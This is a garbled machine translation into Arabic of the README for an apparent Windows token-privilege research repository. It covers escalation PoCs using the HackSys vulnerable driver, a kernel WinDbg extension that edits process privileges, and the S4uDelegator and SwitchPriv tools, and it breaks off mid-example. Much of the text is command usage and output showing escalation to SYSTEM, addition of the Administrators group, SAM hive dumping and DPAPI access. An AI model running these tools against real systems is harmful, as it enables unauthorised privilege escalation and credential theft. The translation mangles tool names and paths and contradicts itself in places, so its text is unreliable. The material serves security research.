PrivFu
1.0.0
تمديد وضع kernel Windbg و POCs لاختبار كيفية امتيازات الرمز المميز.
هناك مستودع ملحوظ ومقالات حول إساءة استخدام امتياز الرمز المميز مثل Grzegorz Tworek's Priv2Admin. تهدف الرموز في هذا المستودع إلى المساعدة في التحقيق في كيفية عمل امتيازات الرمز المميز.
العودة إلى الأعلى
مشروع
يغطي هذا المشروع كيفية الحصول على امتيازات النظام من قذيفة مستوى النزاهة العالية. انظر readme.md للحصول على التفاصيل.
العودة إلى الأعلى
مشروع
الغرض من هذا المشروع هو التحقيق في كيفية إساءة معاملة المهاجمين إلى الضعف الكتب التعسفي. تتم كتابة جميع POCs لسائق Hacksys Extreme Stideable. تؤدي معظم هذه POCs للحصول على مستوى سلامة النظام من خلال إساءة معاملة الضعف في كتابة النواة التعسفية والامتيازات الرمزية. تم اختباره على إصدار Windows 10 1809/1903 ، لكن يجب أن يعملوا معظم Windows 10 من الناحية النظرية:
| اسم POC | وصف |
|---|---|
| createassigntokenvariant | هذا POC يؤدي EOP مع SeCreateTokenPrivilege و SeAssignPrimaryTokenPrivilege . |
| CreateMpersonAtokenVariant | هذا POC يؤدي EOP مع SeCreateTokenPrivilege و SeImpersonatePrivilege . |
| CreateTokenVariant | هذا POC يؤدي EOP مع SeCreateTokenPrivilege . |
| DebuGinjectionVariant | هذا POC يؤدي EOP مع SeDebugPrivilege . يستخدم حقن الكود إلى winlogon.exe في المرحلة النهائية. |
| DEPUGUPDATEPROCVARAINT | هذا POC يؤدي EOP مع SeDebugPrivilege . ينشئ عملية النظام من winlogon.exe مع UpdateProcThreadAttribute API في المرحلة النهائية. |
| RestorevicemodificationVariant | هذا POC يؤدي EOP مع SeRestorePrivilege . استخدام hijackshelllib مع هذا POC. |
| الثانوية | هذا POC يؤدي EOP مع SeCreateTokenPrivilege و SeImpersonatePrivilege . يستخدم خدمة تسجيل الدخول الثانوية في المرحلة النهائية. |
| مستلزمات takeshipservicedificationvariant | هذا POC يؤدي eOP مع SeTakeOwnershipPrivilege . استخدام hijackshelllib مع هذا POC. |
| TCBS4UassignTokenVariant | هذا POC يؤدي EOP مع SeTcbPrivilege . احصل على قذيفة المستوى الإلزامي من المستوى الإلزامي المتوسط. |
| TCBS4UimpersonationVariant | هذا POC يؤدي EOP مع SeTcbPrivilege . يؤدي انتحال شخصيات مع S4U Logon. لا تحصل على مستوى مرتفع أو سلامة النظام. |
العودة إلى الأعلى
مشروع
تحذير
في بعض البيئة ، لا يعمل بناء التصحيح. يفضل بناء الإصدار.
PRIDEDITOR هو تمديد وضع kernel Windbg لمعالجة امتياز الرمز المميز لعملية محددة. هذا الامتداد يجعل من السهل تكوين امتياز الرمز المميز الذي تريد التحقيق فيه:
0: kd> .load C:devPrivEditorx64ReleasePrivEditor.dll
PrivEditor - Kernel Mode WinDbg extension for token privilege edit.
Commands :
+ !getps : List processes in target system.
+ !getpriv : List privileges of a process.
+ !addpriv : Add privilege(s) to a process.
+ !rmpriv : Remove privilege(s) from a process.
+ !enablepriv : Enable privilege(s) of a process.
+ !disablepriv : Disable privilege(s) of a process.
+ !enableall : Enable all privileges available to a process.
+ !disableall : Disable all privileges available to a process.
[*] To see command help, execute "!<Command> help" or "!<Command> /?".
هذا الأمر هو سرد العمليات في نظامك المستهدف:
0: kd> !getps /?
!getps - List processes in target system.
Usage : !getps [Process Name]
Process Name : (OPTIONAL) Specifies filter string for process name.
إذا قمت بتنفيذ هذا الأمر دون أي وسيطات ، فإن قائمة الأوامر هذه جميع العمليات في نظامك المستهدف كما يلي:
0: kd> !getps
PID nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name
======== =================== ======================== ============
0 0xfffff805`81233630 0x00000000`00000000 Idle
4 0xffffd60f`ec068380 0xffffaf00`cec07a40 System
68 0xffffd60f`f1780480 0xffffaf00`d3b290a0 svchost.exe
88 0xffffd60f`ec0db080 0xffffaf00`cec0d080 Registry
324 0xffffd60f`ef342040 0xffffaf00`d0416080 smss.exe
348 0xffffd60f`f052f100 0xffffaf00`d25d30a0 dwm.exe
408 0xffffd60f`eca8e140 0xffffaf00`d21bd930 csrss.exe
480 0xffffd60f`f05a8340 0xffffaf00`d2568670 svchost.exe
484 0xffffd60f`efcd60c0 0xffffaf00`d06430e0 wininit.exe
500 0xffffd60f`efd130c0 0xffffaf00`d23100a0 csrss.exe
580 0xffffd60f`efdc0080 0xffffaf00`d2266630 winlogon.exe
--snip--
إذا كنت تريد معرفة عمليات محددة ، فقم بتعيين مرشح السلسلة على النحو التالي. يعمل المرشح بمطابقة للأمام وغير حساس للحالة:
0: kd> !getps micro
PID nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name
======== =================== ======================== ============
4568 0xffffd60f`f14ed080 0xffffaf00`d3db60a0 MicrosoftEdge.exe
4884 0xffffd60f`f1647080 0xffffaf00`d3fc17b0 MicrosoftEdgeCP.exe
4892 0xffffd60f`f1685080 0xffffaf00`d3fc07b0 MicrosoftEdgeSH.exe
هذا الأمر هو سرد امتيازات رمزية لعملية محددة:
0: kd> !getpriv /?
!getpriv - List privileges of a process.
Usage : !getpriv <PID>
PID : Specifies target process ID.
لاستخدام هذا الأمر ، تحتاج إلى تعيين معرف عملية الهدف بتنسيق عشري على النحو التالي:
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 5704
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0
هذا الأمر هو إضافة امتيازات الرمز المميز إلى عملية محددة:
0: kd> !addpriv /?
!addpriv - Add privilege(s) to a process.
Usage : !addpriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
+ IncreaseQuota : SeIncreaseQuotaPrivilege.
+ MachineAccount : SeMachineAccountPrivilege.
+ Tcb : SeTcbPrivilege.
+ Security : SeSecurityPrivilege.
+ TakeOwnership : SeTakeOwnershipPrivilege.
+ LoadDriver : SeLoadDriverPrivilege.
+ SystemProfile : SeSystemProfilePrivilege.
+ Systemtime : SeSystemtimePrivilege.
+ ProfileSingleProcess : SeProfileSingleProcessPrivilege.
+ IncreaseBasePriority : SeIncreaseBasePriorityPrivilege.
+ CreatePagefile : SeCreatePagefilePrivilege.
+ CreatePermanent : SeCreatePermanentPrivilege.
+ Backup : SeBackupPrivilege.
+ Restore : SeRestorePrivilege.
+ Shutdown : SeShutdownPrivilege.
+ Debug : SeDebugPrivilege.
+ Audit : SeAuditPrivilege.
+ SystemEnvironment : SeSystemEnvironmentPrivilege.
+ ChangeNotify : SeChangeNotifyPrivilege.
+ RemoteShutdown : SeRemoteShutdownPrivilege.
+ Undock : SeUndockPrivilege.
+ SyncAgent : SeSyncAgentPrivilege.
+ EnableDelegation : SeEnableDelegationPrivilege.
+ ManageVolume : SeManageVolumePrivilege.
+ Impersonate : SeImpersonatePrivilege.
+ CreateGlobal : SeCreateGlobalPrivilege.
+ TrustedCredManAccess : SeTrustedCredManAccessPrivilege.
+ Relabel : SeRelabelPrivilege.
+ IncreaseWorkingSet : SeIncreaseWorkingSetPrivilege.
+ TimeZone : SeTimeZonePrivilege.
+ CreateSymbolicLink : SeCreateSymbolicLinkPrivilege.
+ DelegateSessionUserImpersonate : SeDelegateSessionUserImpersonatePrivilege.
+ All : All privileges.
على سبيل المثال ، إذا كنت ترغب في تعيين SEDEBUGPRIVILEGE لعملية محددة ، فقم بتعيين معرف عملية الهدف للوسيطة الأولى وتقصير debug اسم الامتياز كما هو مدرج في رسالة المساعدة للوسيطة الثانية على النحو التالي:
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 5704
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0
0: kd> !addpriv 5704 debug
[>] Trying to add SeDebugPrivilege.
[*] Done.
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 5704
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0
وسيطة اسم الامتياز هي حالة غير حساسة.
إذا كنت ترغب في إضافة جميع امتيازات الرمز المميز في وقت واحد ، فقم بتعيين all كوسيطة اسم الامتياز:
0: kd> !addpriv 5704 all
[>] Trying to add all privileges.
[*] Done.
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeCreateTokenPrivilege Disabled
SeAssignPrimaryTokenPrivilege Disabled
SeLockMemoryPrivilege Disabled
SeIncreaseQuotaPrivilege Disabled
SeMachineAccountPrivilege Disabled
SeTcbPrivilege Disabled
SeSecurityPrivilege Disabled
--snip--
هذا الأمر هو إزالة امتيازات الرمز المميز من عملية محددة:
0: kd> !rmpriv /?
!rmpriv - Remove privilege(s) from a process.
Usage : !rmpriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
--snip--
إذا كنت ترغب في إزالة sechangenotifyprivilege ، قم بتنفيذ هذا الأمر على النحو التالي:
0: kd> !getpriv 352
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 352
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770
0: kd> !rmpriv 352 changenotify
[>] Trying to remove SeChangeNotifyPrivilege.
[*] Done.
0: kd> !getpriv 352
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 352
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770
كأمر !addpriv ، يمكنك إزالة جميع الامتيازات الرمزية في وقت واحد عن طريق تعيين all كوسيطة اسم الامتياز:
0: kd> !rmpriv 352 all
[>] Trying to remove all privileges.
[*] Done.
0: kd> !getpriv 352
Privilege Name State
========================================== ========
[*] PID : 352
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770
هذا الأمر هو تمكين امتيازات (ق) الرمز المميز لعملية محددة:
0: kd> !enablepriv /?
!enablepriv - Enable privilege(s) of a process.
Usage : !enablepriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
--snip--
الحجة الأولى هي معرف العملية ، والثاني هو اسم الامتياز الرمزي:
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
0: kd> !enablepriv 1932 timezone
[>] Trying to enable SeTimeZonePrivilege.
[*] Done.
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
إذا حاولت تمكين الامتياز (غير) ، ولم تتم إضافته بعد ، فإن هذا الأمر يضيفه تلقائيًا:
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
0: kd> !enablepriv 1932 debug
[*] SeDebugPrivilege is not present.
[>] Trying to add SeDebugPrivilege.
[>] Trying to enable SeDebugPrivilege.
[*] Done.
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
هذا الأمر هو تعطيل امتيازات الرمز المميز لعملية محددة:
0: kd> !disablepriv /?
!disablepriv - Disable privilege(s) of a process.
Usage : !disablepriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
--snip--
لاستخدام هذا الأمر ، قم بتعيين معرف عملية الهدف للوسيطة الأولى واسم امتياز الرمز المميز للوسيطة الثانية:
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
0: kd> !disablepriv 1932 debug
[>] Trying to disable SeDebugPrivilege.
[*] Done.
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
هذا الأمر هو تمكين جميع امتيازات (ق) الرمز المميز المتاح لعملية محددة:
0: kd> !enableall /?
!enableall - Enable all privileges available to a process.
Usage : !enableall <PID>
PID : Specifies target process ID.
إنه يعمل على النحو التالي:
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Disabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
0: kd> !enableall 3792
[>] Trying to enable all available privileges.
[*] Done.
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Enabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
هذا الأمر هو تعطيل جميع الامتيازات الرمزية لعملية محددة:
0: kd> !disableall /?
!disableall - Disable all privileges available to a process.
Usage : !disableall <PID>
PID : Specifies target process ID.
هذا الأمر يعادل !disablepriv <PID> all . يعمل على النحو التالي:
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Enabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
0: kd> !disableall 3792
[>] Trying to disable all available privileges.
[*] Done.
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Disabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
العودة إلى الأعلى
مشروع
هذا المشروع هو POCs لامتيازات الرمز المميز الحساسة مثل SeDebugPrivilege . حاليا ، تم إصدار POCs لجزء منهم.
| اسم البرنامج | وصف |
|---|---|
| seauditprivilegepoc | يحاول هذا POC إنشاء حدث (أحداث) أمنية جديدة بواسطة SeAuditPrivilegePoC . لا يتطلب SeAuditPrivilege مستوى عالٍ من النزاهة ، لكن هذا POC يتطلب امتيازات إدارية في التنفيذ الأول لتثبيت مصدر حدث جديد. بالإضافة إلى ذلك ، لتأكيد النتيجة ، قد يتطلب هذا POC تعديل إعداد سياسة الأمن المحلية. |
| spackupprivilegepoc | يحاول هذا POC تفريغ HKLMSAM بواسطة SeBackupPrivilege . |
| ScreeTepageFilePrivileGepoc | يحاول هذا POC تعيين خيار PageFile إلى قيم محددة بواسطة SeCreatePagefilePrivilege . |
| SCREATENTOKENPRIVILEGEPOC | يحاول هذا POC إنشاء رمز مرتفع بواسطة SeCreateTokenPrivilege . |
| sedebugprivilegepoc | يحاول هذا POC فتح مقبض لـ winlogon.exe بواسطة SeDebugPrivilege . |
| Serestoreprivilegepoc | يحاول هذا POC كتابة ملف اختبار في C:WindowsSystem32 بواسطة SeRestorePrivilege . |
| sesecurityprivilegepoc | يحاول هذا POC قراءة أحدث حدث أمني بواسطة SeSecurityPrivilege . |
| seshutdownprivilegepoc | يحاول هذا POC التسبب في BSOD بواسطة SeShutdownPrivilege . |
| sesystemEnvironmentPrivileGepoc | يحاول هذا POC تعداد بيئة النظام بواسطة SeSystemEnvironmentPrivilege . يعمل لنظام UEFI القائم فقط. بسبب وظائف نظام التشغيل ، لا يعمل هذا POC مع Oss في وقت سابق Windows 10 Build 1809. |
| setakeOwnIrniveryPrivileGepoc | يحاول هذا POC تغيير مالك HKLM:SYSTEMCurrentControlSetServicesdmwappushservice إلى حساب مستخدم المتصل بواسطة SeTakeOwnershipPrivilege . |
| setCbprivileGepoc | يحاول هذا POC أداء Logon S4U ليتم BuiltinBackup Operators بواسطة SeTcbPrivilege . |
| setRustedCredManAccessprivileGepoc | يحاول هذا POC الوصول إلى DPAPI blob بواسطة SeTrustedCredManAccessPrivilege . |
العودة إلى الأعلى
مشروع
هذه الأداة هي أداء S4U Logon مع setCbprivilege. لتنفيذ تسجيل الدخول S4U باستخدام هذه الأداة ، هناك حاجة إلى امتيازات إدارية.
PS C:Tools> .S4uDelegator.exe -h
S4uDelegator - Tool for S4U Logon.
Usage: S4uDelegator.exe [Options]
-h, --help : Displays this help message.
-l, --lookup : Flag to lookup account SID.
-x, --execute : Flag to execute command.
-c, --command : Specifies command to execute. Default is cmd.exe.
-d, --domain : Specifies domain name to lookup or S4U logon.
-e, --extra : Specifies group SIDs you want to add for S4U logon with comma separation.
-n, --name : Specifies account name to lookup or S4U logon.
-s, --sid : Specifies SID to lookup.
لاستخدام هذه الأداة ، يجب تحديد علامة -l أو -x . -l العلم هو البحث عن معلومات الحساب على النحو التالي:
PS C:Tools> .S4uDelegator.exe -l -d contoso -n "domain admins"
[*] Account Name : CONTOSODomain Admins
[*] SID : S-1-5-21-3654360273-254804765-2004310818-512
[*] Account Type : Group
PS C:Tools> .S4uDelegator.exe -l -s S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736
[*] Account Name : NT SERVICEWinDefend
[*] SID : S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736
[*] Account Type : WellKnownGroup
لتنفيذ الأمر مع S4U Logon ، وعلم -x ، وحدد اسم الحساب أو SID على النحو التالي. يمكن تحديد أمر التنفيذ مع خيار -c (الافتراضي هو cmd.exe ):
PS C:Tools> whoami /user
USER INFORMATION
----------------
User Name SID
============ =============================================
contosojeff S-1-5-21-3654360273-254804765-2004310818-1105
PS C:Tools> .S4uDelegator.exe -x -d . -n admin
[*] S4U logon target information:
[*] Account : CL01admin
[*] SID : S-1-5-21-2659926013-4203293582-4033841475-500
[*] UPN : (Null)
[*] Type : User
[>] Trying to get SYSTEM.
[+] Got SYSTEM privileges.
[>] Trying to S4U logon.
[+] S4U logon is successful.
[>] Trying to create a token assigned process.
Microsoft Windows [Version 10.0.18362.175]
(c) 2019 Microsoft Corporation. All rights reserved.
C:Tools>whoami /user
USER INFORMATION
----------------
User Name SID
========== =============================================
cl01admin S-1-5-21-2659926013-4203293582-4033841475-500
إذا كنت ترغب في إضافة معلومات جماعية إضافية ، فقم بتعيين SIDs Group بقيمة مفصولة بفاصلة مع خيار -e على النحو التالي:
PS C:Tools> whoami /user
USER INFORMATION
----------------
User Name SID
============= =============================================
contosodavid S-1-5-21-3654360273-254804765-2004310818-1104
PS C:Tools> .S4uDelegator.exe -x -d contoso -n jeff -e S-1-5-32-544,S-1-5-20 -c powershell
[*] S4U logon target information:
[*] Account : CONTOSOjeff
[*] SID : S-1-5-21-3654360273-254804765-2004310818-1105
[*] UPN : [email protected]
[*] Type : User
[>] Verifying extra group SID(s).
[*] BUILTINAdministrators (SID : S-1-5-32-544) will be added as a group.
[*] NT AUTHORITYNETWORK SERVICE (SID : S-1-5-20) will be added as a group.
[>] Trying to get SYSTEM.
[+] Got SYSTEM privileges.
[>] Trying to S4U logon.
[+] S4U logon is successful.
[>] Trying to create a token assigned process.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:Tools> whoami /user
USER INFORMATION
----------------
User Name SID
============ =============================================
contosojeff S-1-5-21-3654360273-254804765-2004310818-1105
PS C:Tools> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTINUsers Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYNETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYAuthenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYThis Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTINAdministrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYNETWORK SERVICE Well-known group S-1-5-20 Mandatory group, Enabled by default, Enabled group
CONTOSOServerAdmins Group S-1-5-21-3654360273-254804765-2004310818-1103 Mandatory group, Enabled by default, Enabled group
Service asserted identity Well-known group S-1-18-2 Mandatory group, Enabled by default, Enabled group
Mandatory LabelSystem Mandatory Level Label S-1-16-16384
تحذير
إذا جربت S4U Logon مع حساب غير محدد للجهاز المستهدف ، فستحصل على خطأ
0xC0000142(STATUS_DLL_INIT_FAILED) ولا يمكن تنفيذ الأمر. لتجنب هذه المشكلة ، أضف مجموعات متميزة كمجموعات إضافية مع خيار-e.بالإضافة إلى ذلك ، لا يمكن تحديد بعض الحسابات كمجموعة إضافية (على سبيل المثال
NT SERVICETrustedInstaller) لتسجيل الدخول S4U. إذا قمت بتعيين حسابات المجموعة هذه كمجموعة إضافية ، فسيتم فشل S4U Logon مع Error0x00000005(ERROR_ACCESS_DENIED)
العودة إلى الأعلى
مشروع
هذه الأداة هي تمكين أو تعطيل امتيازات رمزية محددة لعملية:
PS C:Dev> .SwitchPriv.exe -h
SwitchPriv - Tool to control token privileges.
Usage: SwitchPriv.exe [Options]
-h, --help : Displays this help message.
-d, --disable : Specifies token privilege to disable or "all".
-e, --enable : Specifies token privilege to enable or "all".
-f, --filter : Specifies token privilege you want to remain.
-i, --integrity : Specifies integrity level to set in decimal value.
-p, --pid : Specifies the target PID. Default specifies PPID.
-r, --remove : Specifies token privilege to remove or "all".
-s, --search : Specifies token privilege to search.
-g, --get : Flag to get available privileges for the target process.
-l, --list : Flag to list values for --integrity options.
-S, --system : Flag to run as "NT AUTHORITYSYSTEM".
لسرد القيم لخيار --integrity ، قم بتنفيذ مع -علامة --list على النحو التالي:
PS C:Dev> .SwitchPriv.exe -l
Available values for --integrity option:
* 0 : UNTRUSTED_MANDATORY_LEVEL
* 1 : LOW_MANDATORY_LEVEL
* 2 : MEDIUM_MANDATORY_LEVEL
* 3 : MEDIUM_PLUS_MANDATORY_LEVEL
* 4 : HIGH_MANDATORY_LEVEL
* 5 : SYSTEM_MANDATORY_LEVEL
* 6 : PROTECTED_MANDATORY_LEVEL
* 7 : SECURE_MANDATORY_LEVEL
Example :
* Down a specific process' integrity level to Low.
PS C:> .SwitchPriv.exe -p 4142 -s 1
Protected and Secure level should not be available, but left for research purpose.
يتم تحديد عملية PID المستهدفة مع خيار -p . يمكنك سرد الامتيازات المتاحة للعملية المستهدفة مع خيار -g Flag و -p على النحو التالي:
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
عندما لا يتم تحديد خيار -p ، سيكون PID PID PID لهذه الأداة:
PS C:Dev> .SwitchPriv.exe -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 6772
[*] Process Name : powershell
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
يتم تحديد اسم الامتياز للتحكم بأي حال من الأحداث غير الحساسة التي يمكن أن تحدد اسم امتياز فريد في الامتيازات المتاحة للعملية المستهدفة. على سبيل المثال ، لتمكين SeUndockPrivilege للعملية المستهدفة ، تنفذ مع خيار --enable على النحو التالي:
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -e und
[>] Trying to enable a token privilege.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] SeUndockPrivilege is enabled successfully.
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
عندما تقوم بتعيين سلسلة زائفة لا يمكنها تحديد اسم امتياز فريد ، ستحصل على رسالة التالية:
PS C:Dev> .SwitchPriv.exe -p 9408 -e se
[>] Trying to enable a token privilege.
[*] Target PID : 9408
[*] Process Name : Notepad
[-] Cannot specify a unique privilege to enable.
[*] SeShutdownPrivilege
[*] SeChangeNotifyPrivilege
[*] SeUndockPrivilege
[*] SeIncreaseWorkingSetPrivilege
[*] SeTimeZonePrivilege
[*] Done.
على سبيل المثال ، لتمكين SechangenOtifyPrivilege ، تنفذ مع -خيار --disable على النحو التالي:
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
